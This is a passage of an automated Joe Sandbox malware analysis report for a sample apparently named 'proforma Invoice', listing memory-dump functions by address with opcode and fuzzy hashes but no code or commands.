                                                                          • Instruction Fuzzy Hash: 60111773900119ABCB19DB94CC84EDFBBBCEF58258F044166A906A7211EB34AA15CBA0
                                                                          Function 0116208A Relevance: .0, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                          • Instruction ID: eedd20435f42af56c045f9a70bbfc9865c34c8da979d30e1f75713e41bdc8b02
                                                                          • Opcode Fuzzy Hash: cec1b93156338fd1fb8a58b034706470ae4e768dca4fd24834b6fe138f7a55f1
                                                                          • Instruction Fuzzy Hash: 9C01F1322002028BEF1D9A2DD880EA6B76ABFC4700F5A45A9ED058F246DB728891C790
                                                                          Function 011F6500 Relevance: .0, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 3fbbf2e67758011052cce50468361e3f820e35cacb39bd388d42ed6398a561e5
                                                                          • Instruction ID: c6eff54a601c8764766d093ec56440d2c4d1fc4254dc6404ede719e3eb20e1b8
                                                                          • Opcode Fuzzy Hash: 3fbbf2e67758011052cce50468361e3f820e35cacb39bd388d42ed6398a561e5
                                                                          • Instruction Fuzzy Hash: D111E1326001469FC309CF28D800BA2BBB9FB5A344F088159E9489F325D732EC80CBA0
                                                                          Function 011EC810 Relevance: .0, Instructions: 50COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a10bc2f7256d5250cb2c8bc6d95c03f68777b0b58bd58bde18e6b4e2c6b02770
                                                                          • Instruction ID: 7b2de6cd53e24ab47022333dddb61b43fafb0eb38baeb2142a237c7aa4164c21
                                                                          • Opcode Fuzzy Hash: a10bc2f7256d5250cb2c8bc6d95c03f68777b0b58bd58bde18e6b4e2c6b02770
                                                                          • Instruction Fuzzy Hash: C81118B1A00609ABCB04DFA9D585AAEBBF8FF58250F50406AA905E7351D774EA018BA4
                                                                          Function 0115C020 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                          • Instruction ID: bd8eb9d3263dd7d5c03f71f1bb789e84667cf58485ff03620e24658fdac4f97d
                                                                          • Opcode Fuzzy Hash: dec391378cc995e4bcc1589e6a6118842a70016cea674f56f99eea4ad8bc76d4
                                                                          • Instruction Fuzzy Hash: CF0192321007459BEF2EAAA9D840FA777ADBFD5218F058419E9568B540DB74E402CB91
                                                                          Function 011A20F0 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4400631b61cd71d2c685a831522079d956f8f31454ca6284670a2f4efa4ab2ee
                                                                          • Instruction ID: ebf8d45b340dd96f0ec894d50c11ea30c3bc5e3920574ef84eb0fdaefd8cce15
                                                                          • Opcode Fuzzy Hash: 4400631b61cd71d2c685a831522079d956f8f31454ca6284670a2f4efa4ab2ee
                                                                          • Instruction Fuzzy Hash: 19116979A0020DABCB09EFA4D850BAE7BB5EF44244F404059E9159B290EB35AE11CB91
                                                                          Function 0119E5CF Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 44964ec5e9a9169356dc63afd6f39bb3f292d61a869bed9cccf189ef63e0b031
                                                                          • Instruction ID: 7500bd0385791b07a2b4ff74069f050934a97ff046439a60ae4f3e515001aa5d
                                                                          • Opcode Fuzzy Hash: 44964ec5e9a9169356dc63afd6f39bb3f292d61a869bed9cccf189ef63e0b031
                                                                          • Instruction Fuzzy Hash: C601A7712115457FD719BB79CD84E57B7BCFF946587000629B50583651DB34EC02CAE0
                                                                          Function 011F69C0 Relevance: .0, Instructions: 49COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: ee4f27d891602d9cd87eecec4e5be55ef353dbd353701992ddbd2e29d2a19e4b
                                                                          • Instruction ID: bb967445206659747365960f3535c75d3444a6bd04a59ffeffc519855ae492c0
                                                                          • Opcode Fuzzy Hash: ee4f27d891602d9cd87eecec4e5be55ef353dbd353701992ddbd2e29d2a19e4b
                                                                          • Instruction Fuzzy Hash: 3501FC32224312DBC328DF69D88896BFBA8FF54664F51422DEA6987280E7309905C7D2
                                                                          Function 011EC460 Relevance: .0, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 47a8a4e1755708eea58161583a0c2b255032dc190f0e79c8cfec18f442b03ca0
                                                                          • Instruction ID: ecd4f0a7d4463acc8fc3917be9160d4346be55d7b455aa6f9adc6a6b45fe7dbd
                                                                          • Opcode Fuzzy Hash: 47a8a4e1755708eea58161583a0c2b255032dc190f0e79c8cfec18f442b03ca0
                                                                          • Instruction Fuzzy Hash: 78115B75A00609ABDB19EFA8C844EAE7BB5EB48254F004059B90197340DB34EA11CB90
                                                                          Function 011EC97C Relevance: .0, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 973bc9fc0e2e834e1c02fde83379f6844c5ead1bd990ded324dbed6ea6e9ed1a
                                                                          • Instruction ID: a382eecc5396efc65d741db68edcf8dc27b92cf65ee38a91469ac832bc71172c
                                                                          • Opcode Fuzzy Hash: 973bc9fc0e2e834e1c02fde83379f6844c5ead1bd990ded324dbed6ea6e9ed1a
                                                                          • Instruction Fuzzy Hash: E31139B16187099FC704DF69D845A5BBBE4EF98710F40455AB998D7391E730E900CB92
                                                                          Function 011ECA11 Relevance: .0, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: d6341b34e3033d518c64bb6de79e34dc59f6f3881d8eb4be78c7be258f1160ac
                                                                          • Instruction ID: 87f22bb8d460b8750fed903401075b094ed396b9abaafe95563b4c72d6b46924
                                                                          • Opcode Fuzzy Hash: d6341b34e3033d518c64bb6de79e34dc59f6f3881d8eb4be78c7be258f1160ac
                                                                          • Instruction Fuzzy Hash: 681179B16187089FC314DF69D845A4BBBE4FF99350F40851AB958D73A0E730E900CB92
                                                                          Function 01234A80 Relevance: .0, Instructions: 48COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                          • Instruction ID: 7d95c561c353c94dcf4da42c54f8c17d154f6d98afa06986844c64733a867de0
                                                                          • Opcode Fuzzy Hash: 4be238ecb871e70af7da4c9819feb513cc5cd9ee9a4f29187abed574232cbb68
                                                                          • Instruction Fuzzy Hash: F40128732147429FD725AA59D850F56B7EAFBC2210F044559E7428B650DBB0F841C750
                                                                          Function 0117E016 Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                          • Instruction ID: b1dee81bf92802af3332001ebee74cee83f96736100e9f95f3075091b7a26758
                                                                          • Opcode Fuzzy Hash: 0b4e63a3af2f36388c19bb01a8158bbf85eee50dbe01f6888877beb839016758
                                                                          • Instruction Fuzzy Hash: 2401B1713065849FE32B862CC948F6A7BE8EF46758F0900A5FA05CB7A1D728DC41C222
                                                                          Function 0115826B Relevance: .0, Instructions: 46COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: cc28aff52aa27b1a604e714c1a47dddc680f087634258a678ff6c0c609dc76a2
                                                                          • Instruction ID: f001e0db7db791f0a1b91833a76ff24bc062931b92fb0f07c66846986542c5ef
                                                                          • Opcode Fuzzy Hash: cc28aff52aa27b1a604e714c1a47dddc680f087634258a678ff6c0c609dc76a2
                                                                          • Instruction Fuzzy Hash: FE01DF32700A05EBD75CEBAAD8449AEBBA9EF806A4B094029DD01A7644DF70E901C691
                                                                          Function 01162582 Relevance: .0, Instructions: 45COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: fe356ddab4b668e71d4d5650872301272705ad6a8fc6267ba5f8a0d71ce9bc32
                                                                          • Instruction ID: db947739063647c9744d496cf41d62a9638e4fbc5a7ce2f6c21d8977704848eb
                                                                          • Opcode Fuzzy Hash: fe356ddab4b668e71d4d5650872301272705ad6a8fc6267ba5f8a0d71ce9bc32
                                                                          • Instruction Fuzzy Hash: 5FF0F933741611B7C739DB568C40F87BEADEB84B90F014429A60597600CB30DD01C7A0
                                                                          Function 0118C073 Relevance: .0, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                          • Instruction ID: a99a5584cc23619578a7975918fa47b457464733ef60a6ce663d80d8f35ecea2
                                                                          • Opcode Fuzzy Hash: 65a6da88ffe4e3ef4f4bf4dda68b508183db8c002971e90ba11f3763248cd9ea
                                                                          • Instruction Fuzzy Hash: 71F0C2B6600615ABD328DF4DDC40F57FBEEDBD1A84F048528A645C7320EA31DD05CB90
                                                                          Function 0115C310 Relevance: .0, Instructions: 43COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                          • Instruction ID: d09ab0ec65697632ae1df161e8c28370558c29316fcc5cf85405b74a5fa4cdd2
                                                                          • Opcode Fuzzy Hash: 256e141dc6b9705f9909cc47be5080ee0eb4db29c7708f1459163a76593eb05a
                                                                          • Instruction Fuzzy Hash: 99F0F233108733DBD7FE1F594440B6BA69D8FE1A54F160035EA2557201CBA18D0197D1
                                                                          Function 0119CA6F Relevance: .0, Instructions: 42COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                          • Instruction ID: 52d76b38fba3f8fce0582be6726d144e5e2c20da0a5f71f336b786d07d5ea20c
                                                                          • Opcode Fuzzy Hash: 6225b3f56bb7e4a8823ac3bf287c1186c08f5b75335344108ff231fc305a603f
                                                                          • Instruction Fuzzy Hash: 8C01F4322046859BD72E975DC809F99BBE8EF41764F0940A9FA548B7A1E778C800C252
                                                                          Function 012361E5 Relevance: .0, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 7b1393ba567efaf1387bf6204ec26468ea2d939272f2fec8ab4b474a53f1aaa5
                                                                          • Instruction ID: 3bc51c79853835e1b3c7c03db7f4078b09085909e5ae1b96d5f6f89a49753626
                                                                          • Opcode Fuzzy Hash: 7b1393ba567efaf1387bf6204ec26468ea2d939272f2fec8ab4b474a53f1aaa5
                                                                          • Instruction Fuzzy Hash: A4018F71A10249ABCB04DFA9D445AEEBBF8BF58314F14005AE500A7380D774EA01CBA4
                                                                          Function 011E63C0 Relevance: .0, Instructions: 41COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                          • Instruction ID: f80ae8df5ea8450468e94c7f4b64784463a4b96bc2122b1fa59eb9e610f8bb79
                                                                          • Opcode Fuzzy Hash: dbb06fbea8421d8b96890fd2b120b20d820a8046168cc589f8d54c87f08ef009
                                                                          • Instruction Fuzzy Hash: E4F01D7220001DBFEF059F94DD80DEF7BBEEB59298B104125FA1192160D731DE21EBA0
                                                                          Function 011EA4B0 Relevance: .0, Instructions: 40COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 9ab0d6c6d5becf9057ed83b442a39635ac030de655b23adc2c3ee00c8f1b3e44
                                                                          • Instruction ID: fcbf8911271fa26f952b63adb705d808a7d738661350d52a5a3e6559a064380c
                                                                          • Opcode Fuzzy Hash: 9ab0d6c6d5becf9057ed83b442a39635ac030de655b23adc2c3ee00c8f1b3e44
                                                                          • Instruction Fuzzy Hash: 9D018536110619ABCF129E94E848EDA3FA6FF4C664F068105FE1866220C332D970EB91
                                                                          Function 0115C0F0 Relevance: .0, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 829d41f1655fe56e01fb75dedccec74171df7b83b463c2e49137b91fc5c6667f
                                                                          • Instruction ID: d3564d023a9b2246a5f36793897fd9f3509681e53ba0ad85725fabbb73a77ede
                                                                          • Opcode Fuzzy Hash: 829d41f1655fe56e01fb75dedccec74171df7b83b463c2e49137b91fc5c6667f
                                                                          • Instruction Fuzzy Hash: 2FF024B2304341DBF79C9A198D81B22329EE7D0691F25806AEF158B2C1EB71DC01C3D5
                                                                          Function 0119656A Relevance: .0, Instructions: 39COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 618f41f29c1173c0c009a119b7507ff45ffe42d31170cd32a9db25e1d10cabcf
                                                                          • Instruction ID: 0494b89c0cbe4b7931c7c09719029ad6bbbf0a61ae5857628c5398024dbfa3b1
                                                                          • Opcode Fuzzy Hash: 618f41f29c1173c0c009a119b7507ff45ffe42d31170cd32a9db25e1d10cabcf
                                                                          • Instruction Fuzzy Hash: 6801A471205B819BF72E9B6CCD4CB2937B4BB40B44F490190FA118BED6DB78D401C622
                                                                          Function 0120437C Relevance: .0, Instructions: 37COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                          • Instruction ID: 91d37473d6e925d296af04170878946651647e6ede17a91695ec19ce4eca2950
                                                                          • Opcode Fuzzy Hash: abe8a162c34942eaba6aef332befd3f6f0562530e07f378f59fd36a18add1061
                                                                          • Instruction Fuzzy Hash: 1FF0E935361D9347EB7BBB2D9410B2AB7A69F90900B25A72C9711CB6C1DF60D8418780
                                                                          Function 011EE872 Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                          • Instruction ID: 9a4e130e7cbb42446c58c80c329d17bbc7090f8567aeefefe5241010be2a49e6
                                                                          • Opcode Fuzzy Hash: 6168c74df7881035f69970a17cdbc8bbd68c52d06f01b9a11dec5043249d3eba
                                                                          • Instruction Fuzzy Hash: B0F0E9337129119BE3398ACDCC84F12B7F8EFD5A60F1A0025A6049B260C360EC02C7D0
                                                                          Function 011EC89D Relevance: .0, Instructions: 36COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: a3e3042b4c41c0d40a00aa40a7825442342392175c3d8c456fd0e2a61f5b6021
                                                                          • Instruction ID: 35e2265eaa8be3e0f17bb89e4d01c94f82fd1b651e5c4935d08569c546648c47
                                                                          • Opcode Fuzzy Hash: a3e3042b4c41c0d40a00aa40a7825442342392175c3d8c456fd0e2a61f5b6021
                                                                          • Instruction Fuzzy Hash: 74F0AF706197049FC318EF68C945E1EBBE4FF98714F80465AB898DB394E734EA00CB96
                                                                          Function 01190854 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                          • Instruction ID: a6aba8cabc33f6ddc39ca543eab6a8294490b45e0e87b338e1ffbf56d79d0e65
                                                                          • Opcode Fuzzy Hash: 4cdcb84ab97496671339d5fdb647af6bc44589d2c26ee95e7ea7cdc637936955
                                                                          • Instruction Fuzzy Hash: 96F0F072A00204AEE718DB21CC00F86B6EDEF9C304F148468A944CB260EBB0DD40C754
                                                                          Function 011E8D20 Relevance: .0, Instructions: 35COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 286fc08457f4bd85766bdc91cd77d0ca42ed08b459c185d65b25be4b969e1f9f
                                                                          • Instruction ID: 0936cf07ebb874e748ee78a71966c68d3e3b51c3c401c9273842fe448e93a5da
                                                                          • Opcode Fuzzy Hash: 286fc08457f4bd85766bdc91cd77d0ca42ed08b459c185d65b25be4b969e1f9f
                                                                          • Instruction Fuzzy Hash: 5FF0B432510644ABD7296A5CE8CCB5EBB9DFB94754F094415FD49671218772BC80C790
                                                                          Function 011EC912 Relevance: .0, Instructions: 34COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: f94ee518e06ffbf7b64d53991ad99b0a5384ad293160aeb36b10f8174e6ff6a1
                                                                          • Instruction ID: c7f4f61f7ead0538d69134919df57cf75228ca317ee8ec14623383d809489abd
                                                                          • Opcode Fuzzy Hash: f94ee518e06ffbf7b64d53991ad99b0a5384ad293160aeb36b10f8174e6ff6a1
                                                                          • Instruction Fuzzy Hash: EBF0AF70A00209AFCB08EFA9C515B5EBBF4EF18304F408055A815EB385EB34EA01CBA0
                                                                          Function 011647FB Relevance: .0, Instructions: 33COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6061ee7df581b450f4d1d15b6ab3d9fe1d32c62a8a521b8a2274cb84cae809b6
                                                                          • Instruction ID: dc433c896c89952f19c921db229142faaecad138ce2675fd58222d8138be7fa3
                                                                          • Opcode Fuzzy Hash: 6061ee7df581b450f4d1d15b6ab3d9fe1d32c62a8a521b8a2274cb84cae809b6
                                                                          • Instruction Fuzzy Hash: 36F0E2319167E1DFE73FDBECC044B61BBDC9B00A34F09896AD58987D22CB26D8A0C651
                                                                          Function 01220115 Relevance: .0, Instructions: 32COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 6860f697ad48a4c9cbf36e142da3e4014c8916418397ae3b1744eb2b29dbbca9
                                                                          • Instruction ID: a1c96e750133415d3404c28fc015c7d533012796d0968bebda9d9695ac5e6ad7
                                                                          • Opcode Fuzzy Hash: 6860f697ad48a4c9cbf36e142da3e4014c8916418397ae3b1744eb2b29dbbca9
                                                                          • Instruction Fuzzy Hash: 58F05C674357D22ACF329B3C74D83E92FB4A751110F691485E9A157209C6749483C328
                                                                          Function 0119C5ED Relevance: .0, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
                                                                          Joe Sandbox IDA Plugin
                                                                          • Snapshot File: hcaresult_3_2_1130000_proforma Invoice.jbxd
                                                                          Similarity
                                                                          • API ID:
                                                                          • String ID:
                                                                          • API String ID:
                                                                          • Opcode ID: 14326a7ba1f1a7d068b104e2fef155aa5f6fd0f5e4793399a0f51cf890953aff
                                                                          • Instruction ID: 87aa04d38977234f0ab10af7831c49489c5fd21848257b928f0663c833013df6
                                                                          • Opcode Fuzzy Hash: 14326a7ba1f1a7d068b104e2fef155aa5f6fd0f5e4793399a0f51cf890953aff
                                                                          • Instruction Fuzzy Hash: A9F027715116919FEF3ED75CC148B617BE4AB807A4F099465D4A6C7752C360F880CBD1
                                                                          Function 011A2619 Relevance: .0, Instructions: 31COMMON
                                                                          Download Yara Rule
                                                                          Memory Dump Source
                                                                          • Source File: 00000003.00000002.2475930945.0000000001130000.00000040.00001000.00020000.00000000.sdmp, Offset: 01130000, based on PE: true
